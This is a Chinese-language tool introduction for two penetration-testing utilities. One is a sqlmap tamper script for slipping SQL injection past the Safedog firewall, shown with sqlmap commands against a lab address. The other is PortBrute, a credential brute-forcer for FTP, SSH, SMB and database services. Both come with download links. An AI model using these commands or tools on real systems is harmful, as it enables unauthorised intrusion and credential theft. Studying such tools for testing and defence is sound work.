工具介绍

此Tamper仅仅适用于MySQL数据库，在SQLMap使用过程中添加参数–tamper=MySQLByPassForSafeDog。

安装与使用

1、安装网站安全狗Apache最新版

2、启用安全狗，不加MySQLByPassForSafeDog绕狗Tamper:

python sqlmap.py -u "http://192.168.2.3:60001/sqli.php?id=1" --random-agent --dbms=mysql

3、启用安全狗，添加MySQLByPassForSafeDog绕狗Tamper:

python sqlmap.py -u "http://192.168.2.3:60001/sqli.php?id=1" --random-agent --dbms=mysql --tamper=MySQLByPassForSafeDog

4、绕过POC

可以添加参数-v 3进行学习查看

python sqlmap.py -u "http://192.168.2.3:60001/sqli.php?id=1" --random-agent --dbms=mysql --tamper=MySQLByPassForSafeDog -v 3

下载地址

项目地址：https://github.com/Tas9er/MySQLByPassForSafeDog

端口爆破工具 – PortBrute配置使用

一、简介

一款跨平台小巧的端口爆破工具，支持爆破FTP/SSH/SMB/MSSQL/MYSQL/POSTGRESQL/MONGOD。

二、使用方法

1、ip.txt中放入需要爆破的ip+端口，比如 10.10.10.10:3306。如果不是标准端口，比如3307是MYSQL。写成 10.10.10.10:3307|MYSQL。其他FTP/SSH/SMB/MSSQL/MYSQL/POSTGRESQL/MONGOD同理

2、Windows/MAC/Linux已经打包好了，分别对应(PortBruteWin.exe/PortBruteMac/PortBruteLinux)。无论是内网渗透，还是日常使用，直接下载下来就可以直接用。

三、下载地址

1、通过该项目地址下载：https://github.com/awake1t/PortBrute